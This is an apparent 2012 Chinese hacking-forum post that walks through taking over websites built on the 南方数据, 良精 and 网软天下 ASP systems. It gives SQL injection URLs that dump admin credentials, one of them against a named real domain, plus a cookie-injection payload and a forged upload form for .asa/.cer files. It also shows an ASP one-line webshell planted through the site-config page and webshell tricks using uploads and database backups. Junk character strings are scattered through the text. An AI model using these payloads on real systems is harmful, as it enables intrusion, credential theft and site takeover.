找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2276|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
4 a' n. L8 C  G- I. q* x1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 , L0 K" k! e  ]
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
" [, v  l5 U+ ~0 K# a; g! N) m2 Q直接暴管理员帐号密码(md5)
: ~4 v/ W2 b) c/ ^* b2.登陆后台2 q; _6 S! \9 e$ Z) _7 a, Z
3.利用编辑器上传:, r% W- l6 i5 u- O* p  e9 a
访问admin/southidceditor/admin_style.asp0 I/ H7 ]9 \9 I8 X1 E% Z
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
0 W8 l3 S% u6 w, R* E0 m  a9 R( i- d
========================================9 Z- _/ w: b( T6 r% P

" A; T* e3 h9 Z+ j' m- _参考资料整理:
" O- j6 b3 y! H) J' Z$ z南方数据、良精系统、网软天下漏洞利用2 O+ V: {/ a3 d6 F1 d

# W3 }: L; X2 U+ b+ {' ?( W1、通过upfile_other.asp漏洞文件直接取SHELL
" Z7 W# O" g$ u直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:/ j2 V  W/ y8 S% o1 B
<HTML><HEAD>
  D# v( l2 a% r4 M- M: q- j<META http-equiv=Content-Type content="text/html; charset=gb2312">   g+ i0 N6 g  B9 v7 }+ ]
<STYLE type=text/css>BODY {
% p  D9 Y; J" f! U2 T, vFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 2 G  \' g7 L( m9 ^" U
} 2 _1 L1 S- s& t* y* c) F' e  t
.tx1 { ; M2 q1 H/ r4 f5 R8 h
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
. C: A- d6 F1 {) K& }}
% F0 \- B: L5 R7 W2 H& q& D8 B8 ]1 _</STYLE>
  V6 ~& u" Z: }3 F  x- S' t' e5 X<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> ! G% t; V. }1 J6 i6 D$ y9 z8 `
<BODY leftMargin=0 topMargin=0> 3 x. Z7 h$ D$ [
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post , E& z: C" U6 o9 J6 u3 h( ]; c! n& V% k
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
1 _% D; M' y. R% ?% a* B<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
+ a) I% `: E/ q" x# u! C2 R: i: |- G7 a2 H4 p
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
, D3 ^( T5 R2 a- W+ O/ R/ |0 U# ?注:此方法通杀南方数据、良精系统、网软天下等
0 x  N, B' I6 \  L! r* y% h/ y3 m+ J. h5 o: }$ {. E
2、通过注入秒杀管理员帐号密码,使用如下:$ n' s" X7 m5 a% s1 V
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’( P9 J  Z% I3 V1 V6 q, q
以上代码直接暴管理员帐号和密码,取SHELL方法如下:$ e2 I6 u% q* n# w
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’% Y3 p: ?& b7 V+ z
成功把shell写入http://www.target.com/inc/config.asp$ s/ a6 ^( j5 X) J' F5 O& n
这里一句话chr(32)密码是“#”
  X) h% W3 C' m5 a3、cookie注入
$ Z/ |8 g' E* ?  n清空地址栏,利用union语句来注入,提交:
; G7 p/ `9 h( X5 u& s8 C. ejavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
3 H! s4 R' c6 G0 E2 Y3 |如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
1 ?6 r- `8 f  ~2 X6 \5 a4 E" f注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
5 w7 v7 w/ a7 ]$ r% C(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)0 F) z4 D4 c6 K( L: m- r% v& x
( V1 v) f' H, ^& f9 A
三、后台取SHELL方法总结
' @9 W( Z3 I& Y9 |7 _0 Z(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
4 G2 C4 E: l: ]7 b/ Q; u然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
1 ?0 c1 d) P7 f  M, h这时再打开一句话马的客户端,提交同样得到一个小马8 F% R; w4 h  j5 S+ U& N9 l
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
9 g/ \' ~1 N4 F3 Q8 k7 D(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:* @- I# X$ h. n
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then; m3 [7 N6 {, z# r
EnableUpload=false& I0 G. f& K( Z. T( l
( r3 b6 {, ^9 F% W' D
end if
8 F& A. `: Q* C, sif EnableUpload=false then
  x* \3 A6 k1 C# o% Hmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType  D6 |, ?0 H( q, ~. `8 t' L' V* j
FoundErr=true" S& a3 V6 k0 s6 _" W. t' C
end if+ U. B+ }# K8 ]( M8 ]$ v* h
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
: e8 g3 Z9 \$ b6 [$ H2 [提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)4 z. q- X+ r# D( [  P0 k
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
% i5 G$ S$ D: Z! K& N' e& X9 `/ p, ]* `, Y: E
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的5 g0 n6 f+ Z8 W
直接访问备份后的地址,就得到一个webshell
- C: D9 M2 L* n, \(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表